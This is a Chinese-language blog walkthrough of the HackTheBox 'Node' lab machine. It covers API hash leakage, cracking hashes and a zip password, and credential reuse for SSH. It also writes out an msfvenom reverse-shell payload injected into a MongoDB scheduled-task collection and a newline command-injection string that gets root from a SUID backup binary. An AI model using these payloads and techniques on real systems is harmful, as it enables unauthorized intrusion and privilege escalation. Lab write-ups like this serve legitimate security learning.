No.118-HackTheBox-Linux-Node-Walkthrough渗透学习

最新推荐文章于 2024-07-26 13:52:53 发布

大余xiyou

最新推荐文章于 2024-07-26 13:52:53 发布

阅读量302

点赞数

分类专栏： Hack The box 文章标签：数据库 java python linux 安全

本文链接：https://blog.csdn.net/qq_34801745/article/details/106380367

版权

Hack The box 专栏收录该内容

136 篇文章 46 订阅

订阅专栏

HackTheBox-Linux-Node-Walkthrough

靶机地址：https://www.hackthebox.eu/home/machines/profile/110
靶机难度：中级（4.3/10）
靶机发布日期：2017年10月24日
靶机描述：
Node focuses mainly on newer software and poor configurations. The machine starts out seemingly easy, but gets progressively harder as more access is gained. In-depth enumeration is required at several steps to be able to progress further into the machine.

作者：大余
时间：2020-05-28

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

在这里插入图片描述

可以看到靶机的IP是10.10.10.58…
在这里插入图片描述
nmap仅发现开放了OpenSSH和Node.js…

在这里插入图片描述
访问web发现存在个登陆界面login…

丢着爆破，刚开始就报断点错误，根据做vulnhub靶机经验，这是半张笑脸…后面继续爆破就没任何目录信息…

查看前端代码，很多js文件…都查看了一番

发现存在/api/users/latest信息目录…
在这里插入图片描述
进入去掉latest，获得了0类的密匙信息…

通过爆破哈希值，获得了密码…这里测试了四个，只有0类可以登陆web…

登陆即可…

进入后download文件…直接下载是无法下载的一直循环下载…
这里需要开启本地代理进行下载…
在这里插入图片描述
下载完后读取发现是base64值，解码后读取文件类型，可看到是ZIP压缩文件…
解压提示需要密码…
这里直接利用fcrackzip暴力破解zip类型文件密码…

成功获得了密码…

解压后，在目录底层继续查看了jx文件内容…
发现了两个信息，mark用户名密码和backup_key…
在这里插入图片描述
利用mark用户名密码成功ssh登陆到靶机…

这里存在三个用户mark、frank、tom，直接列举了tom存在运行的进程…又是app.js
查看发现它访问了mongodb数据库，并执行了任务表中放置的所有任务，可看到setInterval函数，该函数可以在cmd值下执行任何操作…
在这里插入图片描述
命令：sudo msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.51 LPORT=6666 -f elf -o dayushell.elf
利用MSF制作shell…然后scp上传…

命令：mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler

use scheduler
show collections
db.tasks.insertOne({cmd:'/tmp/dayushell.elf'})

登录到mongodb，并使用语法插入要执行的有效负载…
过1分钟左右获得了反向外壳…

在这里插入图片描述
上传LinEnum.sh枚举，枚举SUID时，发现了backup二进制文件…和app.js内看到的backup_key感觉是相匹配的信息…

将backup下载到本地…

通过IDA查看发现，二进制文件的main函数检查有3个，如果返回false，它将跳转到左侧的块以完全退出…
在这里插入图片描述
测试给了它3个论点，输出了内容…

命令：strace ./backup 1 2 3
利用strace调用跟踪程序走向信息…可以看到程序正在尝试读取/etc/myplace/keys中的内容，去看看…

三个密匙…

返回查看backup_key，和前面keys对比，发现第一个密匙凭证一样的…果然是有关联的…
在这里插入图片描述
命令：ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /tmp/a

利用ltrace继续进行探测…这里科普下哈：
strace------跟踪进程的系统调用或信号产生的情况
ltrace-------跟踪进程调用库函数的情况
可以看到该目录使用magicword作为密码进行了压缩，然后该zip文件已进行base64编码，另外注意到有许多使用strchr（）或strstr（）的过滤器，这里可以绕过他们提权…
在这里插入图片描述
命令：./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf '\n/bin/sh\necho OK')"
利用$（），printf和换行符的组合来注入命令成功获得了root权限，并获得了user_flag和root_flag信息…

这里backup还可以利用缓冲区溢出，或者我也提示了base64和magicword密码，可以直接提取root_base64值，然后获得root_flag…

web信息收集+hash爆破+ZIP爆破+mongodb数据库分析提权+信息枚举+backup二进制解析提权

由于我们已经成功得到root权限查看user和root.txt，因此完成这台中级的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。

在这里插入图片描述

大余xiyou

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
No.118-HackTheBox-Linux-Node-Walkthrough渗透学习

**HackTheBox-Linux-Node-Walkthrough**靶机地址：https://www.hackthebox.eu/home/machines/profile/110靶机难度：中级（4.3/10）靶机发布日期：2017年10月24日靶机描述：Node focuses mainly on newer software and poor configurations. The machine starts out seemingly easy, but gets progres
复制链接

扫一扫

专栏目录